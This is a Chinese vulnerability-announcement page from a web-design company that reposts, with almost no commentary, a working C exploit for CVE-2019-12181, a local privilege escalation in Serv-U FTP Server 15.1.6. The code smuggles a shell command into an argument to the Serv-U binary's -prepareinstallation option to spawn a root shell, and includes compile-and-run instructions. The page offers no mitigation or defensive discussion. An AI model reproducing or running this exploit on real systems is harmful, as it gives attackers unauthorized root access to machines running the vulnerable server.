网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线: 152-150-65-006 023-68263070 扫描二维码加我微信 在线QQ

漏洞公告团结互助,让我们共同进步!

当前位置:主页 > 技术资讯 > 网络安全 > 漏洞公告 >

我们的优势: 10年相关行业经验,专业设计师量身定制 设计师一对一服务模式,上百家客户案例! 企业保证,正规流程,正规合作 7*24小时在线服务,售后无忧

最新CVE-2019-12181 Serv-U FTP Server < 15.1.7 - 本地提权漏洞

文章来源:重庆网络安全 发布时间:2019-06-19 22:44:54 围观次数:
分享到:

摘要:CVE-2019-12181 Serv-U 15 1 6 Privilege Escalation vulnerability found by:Guy Levin (@va_start - twitter com va_start) https: blog vastart dev

不多说,直接上源码吧

/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
to compile and run:gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
int main(){
 char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};    
 int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);    
 // if execv is successful, we won't reach here    printf("ret val: %d errno: %d\n", ret_val, errno);    
 return errno;
 }

 

本文由 重庆网络安全 整理发布,转载请保留出处,内容部分来自于互联网,如有侵权请联系我们删除。

相关热词搜索:serv-u 本地提权漏洞 重庆网络安全

上一篇:雷鸟 ESR < 60.7.XXX 'icalrecur_add_bydayrules' 缓冲区溢出漏洞
下一篇:Exploit CVE-2019-10720BlogEngine.NET易博 3.3.6/3.3.7主题Cookie的目录遍历/远程代码执行漏洞

热门资讯

鼠标向下滚动